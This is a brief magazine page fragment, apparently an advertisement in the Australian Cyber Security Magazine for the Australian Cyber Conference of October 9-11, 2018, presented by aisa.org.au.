OCT 9-11
2018
AUSTRALIAN CYBER CONFERENCE
BROUGHT TO YOU BY
aisa.org.au
Australian Cyber Security Magazine | 69